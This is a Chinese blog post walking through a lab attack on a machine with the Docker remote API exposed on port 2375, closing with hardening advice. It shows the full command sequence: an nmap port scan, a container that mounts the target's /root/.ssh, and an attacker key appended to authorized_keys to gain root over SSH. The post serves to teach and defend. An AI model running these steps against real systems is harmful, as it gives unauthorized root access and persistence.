docker 开启远程后可被提权root

当前IP:

[root@node01 ~]# ifconfig eth0|sed -n -e '/inet /p'|awk '{print $2}'
192.168.22.68
[root@node01 ~]#

靶机IP:

192.168.86.190

我们先用 nmap 扫一下 靶机开了哪些端口:

[root@node01 ~]# nmap -sS -p 1-65535 192.168.86.190

Starting Nmap 6.40 ( http://nmap.org ) at 2019-12-25 16:40 CST
Nmap scan report for 192.168.86.190
Host is up (0.00034s latency).
Not shown: 65526 closed ports
PORT      STATE    SERVICE
22/tcp    open     ssh
80/tcp    open     http
873/tcp   open     rsync
2375/tcp  open     unknown                    //docker 远程端口
3306/tcp  filtered mysql
4001/tcp  open     newoak
7001/tcp  open     afs3-callback
8080/tcp  open     http-proxy
60020/tcp open     unknown

Nmap done: 1 IP address (1 host up) scanned in 3.11 seconds
[root@node01 ~]#

我们来 ssh 下 此时是肯定进不去的 ,因为不知道对方服务器密码

[root@node01 ~]# ssh 192.168.86.190
The authenticity of host '192.168.86.190 (192.168.86.190)' can't be established.
ECDSA key fingerprint is SHA256:Kxx3gBWRj3GLge8LsSOKB3L1oWIdq4ULa/wp0GahYHo.
ECDSA key fingerprint is MD5:98:15:93:35:ef:1a:e6:96:1b:4a:aa:11:d9:19:d3:35.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added '192.168.86.190' (ECDSA) to the list of known hosts.
root@192.168.86.190's password: 
Permission denied, please try again.
root@192.168.86.190's password: 
Permission denied, please try again.
root@192.168.86.190's password: 
Permission denied (publickey,gssapi-keyex,gssapi-with-mic,password).
[root@node01 ~]# 

但靶机貌似开了docker 远程 我们可不可以通过这个来突破提权?

思路:
在本机生成密钥对,通过docker 目录映射的方式将 公钥 间接传到 靶机上 实现免密登录

# 查看下 docker 版本

[root@node01 ~]# docker -H 192.168.86.190 version
Client: Docker Engine - Community
 Version:           19.03.5
 API version:       1.40
 Go version:        go1.12.12
 Git commit:        633a0ea
 Built:             Wed Nov 13 07:25:41 2019
 OS/Arch:           linux/amd64
 Experimental:      false

Server: Docker Engine - Community
 Engine:
  Version:          19.03.5
  API version:      1.40 (minimum version 1.12)
  Go version:       go1.12.12
  Git commit:       633a0ea
  Built:            Wed Nov 13 07:24:18 2019
  OS/Arch:          linux/amd64
  Experimental:     false
[root@node01 ~]# 
# 生成密钥对

[root@node01 ~]# ssh-keygen -t rsa -P ''
Generating public/private rsa key pair.
Enter file in which to save the key (/root/.ssh/id_rsa): 
Your identification has been saved in /root/.ssh/id_rsa.
Your public key has been saved in /root/.ssh/id_rsa.pub.
The key fingerprint is:
SHA256:PZVTEV1rZe2VDqXRkZ8nxtzMRF8wru2SIzyeSflBvXI root@node01
The key's randomart image is:
+---[RSA 2048]----+
|             .OO%|
|             =o*X|
|            +++O=|
|         . . =*oB|
|        S o o.o..|
|         . + o . |
|          * * E  |
|         o * *   |
|          + .    |
+----[SHA256]-----+
[root@node01 ~]# ll /root/.ssh/id_rsa
id_rsa      id_rsa.pub  
[root@node01 ~]# 
[root@node01 ~]# cat /root/.ssh/id_rsa.pub 
ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDxd11rFQA5lbv3naOKHXIz7/PwFf+w3zGfHgBO50f0Q71V9H2U8CVc+bL43L5jwe1m4ItqQ+kci+1qu0zov80En0GwXNR3AuohDl9QKijHXBYEUhofTeRxsB5s4WVE6zeR2onR3OJxhSP8T1sKAkkqa1bR6h55Ybp+UNNfedNaKSYR+JFi7GAS1/5QTBiYxv+NSUg5MuBFd6c4YZ/X8r0cTZUjqCWZpBrAtbn5XRNsz/31Y4GOXY6M+L/m/yiuE/8+CWrp7buFaQmW57Y2L9dq6ved98cYvrzKG90LbB/Uz7GSns+TtdKldkU1fLmHwcZ7X2u16wy846KZHD2JEM81 root@node01
[root@node01 ~]# 
# 远程起个 容器 并将 靶机的 .ssh 映射到容器里,便于添加 公钥

[root@node01 ~]# docker -H 192.168.86.190 run -it -v /root/.ssh/:/mnt centos /bin/bash
[root@b74d29f82ead /]#
[root@b74d29f82ead /]# echo 'ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDxd11rFQA5lbv3naOKHXIz7/PwFf+w3zGfHgBO50f0Q71V9H2U8CVc+bL43L5jwe1m4ItqQ+kci+1qu0zov80En0GwXNR3AuohDl9QKijHXBYEUhofTeRxsB5s4WVE6zeR2onR3OJxhSP8T1sKAkkqa1bR6h55Ybp+UNNfedNaKSYR+JFi7GAS1/5QTBiYxv+NSUg5MuBFd6c4YZ/X8r0cTZUjqCWZpBrAtbn5XRNsz/31Y4GOXY6M+L/m/yiuE/8+CWrp7buFaQmW57Y2L9dq6ved98cYvrzKG90LbB/Uz7GSns+TtdKldkU1fLmHwcZ7X2u16wy846KZHD2JEM81 root@node01' >> /mnt/authorized_keys

[root@b74d29f82ead /]# exit

没错 已经可以拿到靶机的 root 了

[root@node01 ~]# ssh 192.168.86.190
Last failed login: Thu Dec 26 09:36:06 CST 2019 from 192.168.22.68 on ssh:notty
There were 6 failed login attempts since the last successful login.
Last login: Wed Dec  4 14:42:44 2019 from 192.168.1.15
[root@localhost ~]# ifconfig eth0|sed -n '/inet /p'|awk '{print $2}'
192.168.86.190
[root@localhost ~]# 

总结

尽量不要开启 docker 远程操作,即时开启也不要全部放行,针对IP或内网网段放行,其次禁用 root 远程登录, 修改默认远程登录端口,创建用户时尽量避免使用弱用户名,比如 测试部 test ... ...

comments powered by Disqus